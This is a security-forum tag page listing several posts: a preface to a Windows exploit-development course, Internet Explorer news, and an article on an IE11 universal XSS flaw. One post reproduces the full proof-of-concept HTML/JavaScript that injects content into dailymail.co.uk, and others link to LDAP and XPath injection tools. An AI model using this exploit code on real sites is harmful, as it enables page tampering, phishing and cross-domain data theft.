Search the Community
Showing results for tags 'explorer'.
-
Hello RST : Exploit Development Course 2015 --> Free Preface Hi and welcome to this website! I know people don’t like to read prefaces, so I’ll make it short and right to the point. This is the preface to a course about Modern Windows Exploit Development. I chose Windows because I’m very familiar with it and also because it’s very popular. In particular, I chose Windows 7 SP1 64-bit. Enough with Windows XP: it’s time to move on! There are a few full-fledged courses about Exploit Development but they’re all very expensive. If you can’t afford such courses, you can scour the Internet for papers, articles and some videos. Unfortunately, the information is scattered all around the web and most resources are definitely not for beginners. If you always wanted to learn Exploit Development but either you couldn’t afford it or you had a hard time with it, you’ve come to the right place! This is an introductory course but please don’t expect it to be child’s play. Exploit Development is hard and no one can change this fact, no matter how good he/she is at explaining things. I’ll try very hard to be as clear as possible. If there’s something you don’t understand or if you think I made a mistake, you can leave a brief comment or create a thread in the forum for a longer discussion. I must admit that I’m not an expert. I did a lot of research to write this course and I also learned a lot by writing it. The fact that I’m an old-time reverse engineer helped a lot, though. In this course I won’t just present facts, but I’ll show you how to deduce them by yourself. I’ll try to motivate everything we do. I’ll never tell you to do something without giving you a technical reason for it. In the last part of the course we’ll attack Internet Explorer 10 and 11. My main objective is not just to show you how to attack Internet Explorer, but to show you how a complex attack is first researched and then carried out. Instead of presenting you with facts about Internet Explorer, we’re going to reverse engineer part of Internet Explorer and learn by ourselves how objects are laid out in memory and how we can exploit what we’ve learned. This thoroughness requires that you understand every single step of the process or you’ll get lost in the details. As you’ve probably realized by now, English is not my first language (I’m Italian). This means that reading this course has advantages (learning Exploit Development) and disadvantages (unlearning some of your English). Do you still want to read it? Choose wisely To benefit from this course you need to know and be comfortable with X86 assembly. This is not negotiable! I didn’t even try to include an assembly primer in this course because you can certainly learn it on your own. Internet is full of resources for learning assembly. Also, this course is very hands-on so you should follow along and replicate what I do. I suggest that you create at least two virtual machines with Windows 7 SP1 64-bit: one with Internet Explorer 10 and the other with Internet Explorer 11. I hope you enjoy the ride! Contents WinDbg Mona 2 Structure Exception Handling (SEH) Heap Windows Basics Shellcode Exploitme1 (ret eip overwrite) Exploitme2 (Stack cookies & SEH) Exploitme3 (DEP) Exploitme4 (ASLR) Exploitme5 (Heap Spraying & UAF) EMET 5.2 Internet Explorer 10 Reverse Engineering IE From one-byte-write to full process space read/write God Mode (1) God Mode (2) Use-After-Free bug Internet Explorer 11 Part 1 Part 2 Regards NO-MERCY PDF'S Soooooooon Source : http://expdev-kiuhnm.rhcloud.com/2015/05/11/contents/
- 9 replies
-
- 1
-
- development
- exploit
-
(and 3 more)
Tagged with:
-
Intrun fel imi pare rau,pentru mine internet explorer o fost ca un tata betiv cate ma batea tot timpul,dar pentru asta eu tot il iubeam,totusi o fost primul meu browser:)))))) Windows 10 will abandon the long-criticized Internet Explorer web browser, replacing it with a new “Project Spartan” brand, Microsoft has confirmed. Microsoft's marketing chief confirmed at the company's ‘Convergence’ conference in Atlanta on Monday that Internet Explorer, the major old web browser brand, will only be used in enterprise compatibility with the new Windows 10, which will be offering a new way of browsing the internet, The Verge reported. “We’ll continue to have Internet Explorer, but we’ll also have a new browser called Project Spartan. We have to name the thing,” Chris Capossela said. Microsoft's new web browser, for the moment being called “Project Spartan”, is currently being developed. Though it’s not available yet, it is said to have rejected the legacy of the IE code, thus becoming easier and faster in operation, with the best Javascript performance, according to some leaks. The project is likely to have a final name with the word “Microsoft” in it, because market research on Google Chrome users showed that people find it appealing. It is expected to be introduced alongside with Windows 10 at the end of this year. Internet Explorer has had a long history, doomed by a negative image, mocked by thousands of people on social media, as it failed to compete with rival Google Chrome or Mozilla Firefox browsers. sursa: http://rt.com/news/241557-microsoft-internet-explorer-killed/
-
PoC Exploit Published for Unpatched Internet Explorer Flaw
mundy. posted a topic in Stiri securitate
A researcher has identified a serious universal cross-site scripting (UXSS) vulnerability in the latest version of Microsoft’s Internet Explorer web browser. The issue was discovered by David Leo, a researcher at the UK-based security firm Deusen. The vulnerability can be leveraged to completely bypass Same Origin Policy (SOP), the policy that prevents scripts loaded from one origin from interacting with a resource from another origin. The bug allows an attacker to “steal anything from another domain, and inject anything into another domain,” the expert said in a post on Full Disclosure. A proof-of-concept (PoC) exploit for the vulnerability, tested on Internet Explorer 11 running on Windows 7, was published by Leo over the weekend. The PoC shows how an external domain can alter the content of a website. In the demonstration, the text “Hacked by Deusen” is injected into the website of The Daily Mail. The URL in the browser’s address bar remains the same -- in this case dailymail.co.uk -- even after the arbitrary content is injected, which makes this vulnerabilty ideal for phishing attacks. Joey Fowler, a senior security engineer at Tumblr, said the exploit has some “quirks,” but it works as long as the targeted website doesn’t have X-Frame-Options headers with “deny” or “same-origin” values. “Pending the payload being injected, most Content Security Policies are also bypassed (by injecting HTML instead of JavaScript, that is),” Fowler said in a reply to Leo’s Full Disclosure post. “It looks like, through this method, all viable XSS tactics are open!” Fowler has also highlighted the fact that the exploit can even bypass standard HTTP-to-HTTPS restrictions. The issue was reported to Microsoft on October 13, 2014. The company says it’s working on fixing the vulnerability, but has pointed out that an attacker needs to trick potential victims into visiting a malicious website for the exploit to work. “To successfully exploit this issue, an adversary would first need to lure a person, often through trickery such as phishing, to a malicious website that they’ve created. SmartScreen, which is on by default in newer versions of Internet Explorer, helps protect against nefarious phishing websites,” a Microsoft spokesperson told SecurityWeek. “We’re not aware of this vulnerability being actively exploited and are working to address it with an update. We continue to encourage customers to avoid opening links from untrusted sources and visiting untrusted sites, and to log out when leaving sites to help protect their information.” This isn’t the first time a vulnerability affecting Microsoft products is disclosed before the company manages to release a patch. Over the past weeks, Google’s Project Zero published the details of three Windows vulnerabilities after the expiration of a 90-day disclosure deadline. Source: securityweek.com -
<title>insider3show</title> <body style="font-family:Georgia;"> <h1>insider3show</h1> <iframe style="display:none;" width=300 height=300 id=i name=i src="1.php"></iframe><br> <iframe width=300 height=100 frameBorder=0 src="http://www.dailymail.co.uk/robots.txt"></iframe><br> <script> function go() { w=window.frames[0]; w.setTimeout("alert(eval('x=top.frames[1];r=confirm(\\'Close this window after 3 seconds...\\');x.location=\\'javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20Deusen%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwindow.open(%27http%3A%2F%2Fwww.dailymail.co.uk%27%2C%27_blank%27%2C%27top%3D0%2C%20left%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dyes%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript%3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22\\';'))",1); } setTimeout("go()",1000); </script> <b>Summary</b><br> An Internet Explorer vulnerability is shown here:<br> Content of dailymail.co.uk can be changed by external domain.<br> <br> <b>How To Use</b><br> 1. Close the popup window("confirm" dialog) after three seconds.<br> 2. Click "Go".<br> 3. After 7 seconds, "Hacked by Deusen" is actively injected into dailymail.co.uk.<br> <br> <b>Screenshot</b><br> <a href="screenshot.png">screenshot.png</a><br> <br> <b>Technical Details</b><br> Vulnerability: Universal Cross Site Scripting(XSS)<br> Impact: Same Origin Policy(SOP) is completely bypassed<br> Attack: Attackers can steal anything from another domain, and inject anything into another domain<br> Tested: Jan/29/2015 Internet Explorer 11 Windows 7<br> <br> <h1><a href="http://www.deusen.co.uk/">www.deusen.co.uk</a></h1><script type="text/javascript"> //<![CDATA[ try{if (!window.CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mirage2:0,oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dok3v=1613a3a185/"},atok:"6e87366c9054a61c3c7f1d71c9cfb464",petok:"0fad4629f14e9e2e51da3427556c8e191894b109-1422897396-1800",zone:"deusen.co.uk",rocket:"0",apps:{}}];CloudFlare.push({"apps":{"ape":"9e0d475915b2fa34aea396c09e17a7eb"}});!function(a,{a=document.createElement("script"),b=document.getElementsByTagName("script")[0],a.async=!0,a.src="//ajax.cloudflare.com/cdn-cgi/nexp/dok3v=919620257c/cloudflare.min.js",b.parentNode.insertBefore(a,}()}}catch(e){}; //]]> </script> Source
-
- dailymail.co.uk
- domain
-
(and 3 more)
Tagged with:
-
Sample application showing practical approach how to exploit Blind LDAP Injection flaw. The tool is intended to be used by IT security researchers and pentesters for educational purposes only. It was first presented at Black Hat 2011. Download: http://ldap-blind-explorer.googlecode.com/files/Ldap%20Blind%20Explorer%201.0.zip
-
Sample application showing practical approach how to exploit Blind XPath Injection flaw. The tool is intended to be used by IT security researchers and pentesters for educational purposes only. It was first presented at Black Hat 2011. Download: http://xpath-blind-explorer.googlecode.com/files/Xpath%20Blind%20Explorer%201.0.zip